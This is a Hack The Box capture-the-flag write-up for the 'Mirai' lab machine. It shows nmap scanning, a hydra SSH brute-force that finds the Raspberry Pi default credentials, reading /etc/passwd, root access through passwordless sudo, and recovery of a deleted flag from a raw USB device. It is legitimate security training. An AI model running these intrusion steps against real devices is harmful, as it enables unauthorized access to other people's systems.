Hack The Box : Mirai
22 August, 2021
Beginning with an nmap scan
---------------------Starting Port Scan-----------------------
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
---------------------Starting Script Scan-----------------------
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
| 1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA)
| 2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA)
| 256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA)
|_ 256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519)
53/tcp open domain dnsmasq 2.76
| dns-nsid:
|_ bind.version: dnsmasq-2.76
80/tcp open http lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
---------------------Starting Full Scan------------------------
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
1779/tcp open pharmasoft
32400/tcp open plex
32469/tcp open unknown
Making a script scan on extra ports: 1779, 32400, 32469
PORT STATE SERVICE VERSION
1779/tcp open upnp Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
32400/tcp open http Plex Media Server httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Server returned status 401 but no WWW-Authenticate header.
|_http-cors: HEAD GET POST PUT DELETE OPTIONS
|_http-favicon: Plex
|_http-title: Unauthorized
32469/tcp open upnp Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
Let's see what port 80 has to offer
$ curl -v 10.10.10.48
* Trying 10.10.10.48:80...
* Connected to 10.10.10.48 (10.10.10.48) port 80 (#0)
> GET / HTTP/1.1
> Host: 10.10.10.48
> User-Agent: curl/7.74.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 404 Not Found
< X-Pi-hole: A black hole for Internet advertisements.
< Content-type: text/html; charset=UTF-8
< Content-Length: 0
< Date: Sat, 21 Aug 2021 11:49:13 GMT
< Server: lighttpd/1.4.35
<
* Connection #0 to host 10.10.10.48 left intact
Notice the response header X-Pi-Hole. Having used PiHole before, I checked out the path /admin/ and got to know the version of this PiHole was 3.1.4. With no exploits available for this version, and nothing from Plex's port as well, I decided to brute force credentials beginning with ssh
$ hydra -L ssh-betterdefaultusers.txt -P ssh-betterdefaultpassword.txt 10.10.10.48 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-08-22 02:57:27
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 17424 login tries (l:132/p:132), ~1089 tries per task
[DATA] attacking ssh://10.10.10.48:22/
[STATUS] 162.00 tries/min, 162 tries in 00:01h, 17265 to do in 01:47h, 16 active
[STATUS] 113.00 tries/min, 339 tries in 00:03h, 17088 to do in 02:32h, 16 active
[STATUS] 126.57 tries/min, 886 tries in 00:07h, 16541 to do in 02:11h, 16 active
[STATUS] 120.80 tries/min, 1812 tries in 00:15h, 15615 to do in 02:10h, 16 active
[22][ssh] host: 10.10.10.48 login: pi password: raspberry
Well... these are the default login credentials of a Raspberry Pi
ssh pi@10.10.10.48
The authenticity of host '10.10.10.48 (10.10.10.48)' can't be established.
ECDSA key fingerprint is SHA256:UkDz3Z1kWt2O5g2GRlullQ3UY/cVIx/oXtiqLPXiXMY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.48' (ECDSA) to the list of known hosts.
pi@10.10.10.48's password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug 27 14:47:50 2017 from localhost
SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.
SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.
pi@raspberrypi:~ $ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
messagebus:x:104:109::/var/run/dbus:/bin/false
avahi:x:105:110:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
ntp:x:106:111::/home/ntp:/bin/false
sshd:x:107:65534::/var/run/sshd:/usr/sbin/nologin
statd:x:108:65534::/var/lib/nfs:/bin/false
pulse:x:109:114:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:110:116:RealtimeKit,,,:/proc:/bin/false
lightdm:x:111:119:Light Display Manager:/var/lib/lightdm:/bin/false
pi:x:1000:1000:,,,:/home/pi:/bin/bash
plex:x:112:120::/var/lib/plexmediaserver:/bin/bash
dnsmasq:x:113:65534:dnsmasq,,,:/var/lib/misc:/bin/false
pihole:x:999:997::/home/pihole:/usr/sbin/nologin
User
The user flag was accessible right away
pi@raspberrypi:~ $ ls *
background.jpg
Desktop:
Plex user.txt
Documents:
BlueJ Projects Greenfoot Projects Scratch Projects
Downloads:
Music:
oldconffiles:
Pictures:
Public:
python_games:
4row_arrow.png badswap.wav catanimation.py fourinarow.py gem6.png Grass_Block.png inkspillspot.png match5.wav RedSelector.png Star.png tetrominoforidiots.py wormy.py
4row_black.png beep1.ogg catgirl.png gameicon.png gem7.png horngirl.png launcher.sh memorypuzzle_obfuscated.py Rock.png starPusherLevels.txt tetromino.py
4row_board.png beep2.ogg cat.png gem1.png gemgem.py inkspilllogo.png match0.wav memorypuzzle.py Selector.png starpusher.py Tree_Short.png
4row_computerwinner.png beep3.ogg drawing.py gem2.png grass1.png inkspill.py match1.wav pentomino.py simulate.py star_solved.png Tree_Tall.png
4row_humanwinner.png beep4.ogg flippybackground.png gem3.png grass2.png inkspillresetbutton.png match2.wav pinkgirl.png slidepuzzle.py star_title.png Tree_Ugly.png
4row_red.png blankpygame.py flippyboard.png gem4.png grass3.png inkspillsettingsbutton.png match3.wav Plain_Block.png squirrel.png tetrisb.mid Wall_Block_Tall.png
4row_tie.png boy.png flippy.py gem5.png grass4.png inkspillsettings.png match4.wav princess.png squirrel.py tetrisc.mid Wood_Block_Tall.png
Templates:
Videos:
pi@raspberrypi:~ $ cat Desktop/user.txt
<flag>
Root
Escalating privilege was really straight-forward as well
pi@raspberrypi:~ $ sudo -l
Matching Defaults entries for pi on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User pi may run the following commands on localhost:
(ALL : ALL) ALL
(ALL) NOPASSWD: ALL
pi@raspberrypi:~ $ su su
No passwd entry for user 'su'
pi@raspberrypi:~ $ sudo su
root@raspberrypi:/home/pi# id
uid=0(root) gid=0(root) groups=0(root)
root@raspberrypi:/home/pi# whoami
root
root@raspberrypi:/home/pi# cat /root/root.txt
I lost my original root.txt! I think I may have a backup on my USB stick...
I checked attached volumes using df
root@raspberrypi:~# df -h
Filesystem Size Used Avail Use% Mounted on
aufs 8.5G 2.8G 5.3G 34% /
tmpfs 100M 13M 88M 13% /run
/dev/sda1 1.3G 1.3G 0 100% /lib/live/mount/persistence/sda1
/dev/loop0 1.3G 1.3G 0 100% /lib/live/mount/rootfs/filesystem.squashfs
tmpfs 250M 0 250M 0% /lib/live/mount/overlay
/dev/sda2 8.5G 2.8G 5.3G 34% /lib/live/mount/persistence/sda2
devtmpfs 10M 0 10M 0% /dev
tmpfs 250M 8.0K 250M 1% /dev/shm
tmpfs 5.0M 4.0K 5.0M 1% /run/lock
tmpfs 250M 0 250M 0% /sys/fs/cgroup
tmpfs 250M 8.0K 250M 1% /tmp
/dev/sdb 8.7M 93K 7.9M 2% /media/usbstick
tmpfs 50M 0 50M 0% /run/user/999
tmpfs 50M 0 50M 0% /run/user/1000
Let's look at the usbstick
root@raspberrypi:~# cd /media/usbstick/
root@raspberrypi:/media/usbstick# ls
damnit.txt lost+found
root@raspberrypi:/media/usbstick# cat damnit.txt
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James
I started looking at ways to recover deleted files and came across this answer on StackExchange. I tried using debugfs but the logdump didn't show anything. So then I tried using grep and it worked, I saw the flag in a jumble of non Unicode characters...
root@raspberrypi:/dev# grep -a -C 500 'a' /dev/sdb | tee /tmp/flag
...
�1�Y
�|}*,.�▒����+-���<flag>
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James